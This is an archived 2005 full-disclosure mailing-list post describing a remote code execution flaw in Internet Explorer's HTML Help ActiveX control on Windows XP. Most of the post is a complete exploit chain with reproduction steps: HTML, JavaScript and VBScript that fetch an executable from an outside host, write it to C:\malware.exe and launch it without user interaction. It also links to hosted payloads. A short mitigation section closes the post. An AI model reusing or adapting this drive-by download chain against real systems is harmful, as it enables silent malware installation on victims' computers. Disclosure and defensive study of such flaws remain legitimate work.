lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050106192711.64118.qmail@web61304.mail.yahoo.com>
From: shreddersub7 at yahoo.com (ShredderSub7)
Subject: Remote Code Execution with Parameters on Windows
	(XP SP2)

Remote Code Execution with Parameters on Windows (XP
SP2): Updated (it can now install any malware file
from the Internet and run it without user interaction
needed)
PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
About the PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe-d.htm
------------------------
How does this exploit work?
The problem with Internet Explorer is that it doesn't
set any restrictions on web pages that request opening
a Windows Help file, compiled with HTML Help. Without
a 

restriction, we can (in Internet Explorer) easily
command to open any local web page stored on a
victim's computer, including web pages that are
founded in Windows Help 

files (with extension .CHM). In this PoC (Proof of
Concept, see below for viewing the PoC), the web page
"compile_date.htm" (that is founded in the Windows
Help file 

"ntshared.chm") will be opened in HTML Help. 
Since we now opened a web page stored in a Windows
Help file (.CHM), it is possible (thanks to the
exploit) to execute an ActiveX control that only fully
works in HTML 

Help files. This ActiveX control can do anything: it
can write files to your hard disk and afterwards, it
could execute those files. So in this PoC, we choosed
to 

launch an ActiveX control for HTML Help that will
first write the HTML application (.HTA file)
"cmdexe.hta" to your C-drive. 

Then, we will execute that file by the same type of
ActiveX control. So in this PoC, it wil execute the
file "C:\cmdexe.hta" after it was written. This HTML
application 

"C:\cmdexe.hta" was programmed to install the real
malware onto your C-drive, in this PoC that will be
"C:\malware.exe". 

If that is all done, we use the exploit one more time:
we will the execute the malware. It is even possible
to add parameters to the executed program. In this
PoC, we 

started the malware file "C:\malware.exe" after it was
written. 

To make it complete, we will delete the HTML
application "C:\cmdexe.hta" because it's not being
used anymore. Also, the 2 needed programs (Internet
Explorer and HTML 

Help) will be automatically shutted down after the
execution is finished without user interaction.
------------------------
How can you reproduce this PoC?

Create the file "cmdexe.htm" with the following code
(please notice that you may have to change some file
paths!):

<html><head><title>CMDExe - PoC</title></head><body>
<br><OBJECT style="display:none" id="locate"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" 

codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm">
</OBJECT>
<OBJECT style="display:none" id="locator"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" 

codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<body
style=\\\"display:none\\\"
scroll=\\\"no\\\"\"+String.fromCharCode(62)+\"<script 

language=\\\"javascript\\\"
src=\\\"http://freehost19.websamba.com/shreddersub7/cmdexe.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",75);setTimeout("window.opener=null;window.close()",7000)</script></body></html>
-----
Then create the file "cmdexe.txt" (please notice that
you may have to change some file paths!): 

function writehta(){
document.write("<script language=\"vbscript\"
src=\"http://freehost19.websamba.com/shreddersub7/cmdexe2.txt\"></script>");
}
function writeexe(){
document.write("<object id=a
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command value=shortcut><param name=item1
value=',cmd.exe,/d /c start /min 

C:/cmdexe.hta'></object><script>a.Click\(\)</script>");
}
function startexe(){
document.write("<object id=b
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command value=shortcut><param name=item1
value=',cmd.exe,/d /c del 

\"C:/cmdexe.hta\"&&start
C:/malware.exe'></object><object id=c
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command 

value=close></object><script>b.Click\(\);c.Click\(\)</script>");
}
setTimeout("writehta()",1);
setTimeout("writeexe()",2000);
setTimeout("startexe()",5000);
-----
If that's done, create the file "cmdexe2.txt" (please
notice that you may have to change some file paths!): 

on error resume next
set conn = CreateObject("ADODB.Recordset")
   With conn
       .Fields.Append "conn", 200, "3000"
       Call .Open
       Call .AddNew
       .Fields("conn").Value = "<body
style=""display:none"" scroll=""no"">"
       Call .AddNew
       .Fields("conn").Value = "<script
language=""vbscript"">: on error resume next : set o =
CreateObject(""msxml2.XMLHTTP"") : o.open 

""GET"",""http://freehost19.websamba.com/shreddersub7/cmdexe.exe"",False
: o.send : set s = createobject(""adodb.stream"") :
s.type=1 : s.open : s.write o.responseBody 

: s.savetofile ""C:\malware.exe"",2 :
window.close()</script>"
       Call .Update
   End With
conn.Save "C:\cmdexe.hta", adPersistXML
conn.Close
-----

If you want to use the same test malware file
"cmdexe.exe" (again: only for testing, do not bring
any damage to somewhone's pc with it, or you're
responsible!), you can 

find it here:
http://freehost19.websamba.com/shreddersub7/cmdexe.exe
-----

If you want to attack Windows XP RTM (Gold), Windows
XP SP1 or Windows Server 2003 systems, you might have
to upload the "hhctrl.ocx" file too:
http://freehost19.websamba.com/shreddersub7/hhctrl.ocx
------------------------
How to avoid this exploit...
Since there are still no patches from Microsoft
available yet, here are some (temporary?) solutions:  
Disable Internet Explorer
or disable Active Scripting.  
 Use another browser,
for example Mozilla FireFox. 
------------------------
To Microsoft: Disable the possibility to integrate
HTML Help Controls in HTML web pages.
Also, disable the possibility to open HTML Help files
randomly out of a HTML web page.
And come on, use some more restricted security zones
for HTML applications! 
------------------------
You can find the PoC, as it is explained above, here:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm.
The PoC on this page installs and opens a test malware
file in your C-drive (called "C:\malware.exe"),
nothing more than that. It will not bring any harm to
your pc.
Contact: ShredderSub7_at_yahoo.com (off course,
replace the "_at_" part with an "@" if you want me to
receive your email!)
------------------------
ShredderSub7


		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - Find what you need with new enhanced search.
http://info.mail.yahoo.com/mail_250

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ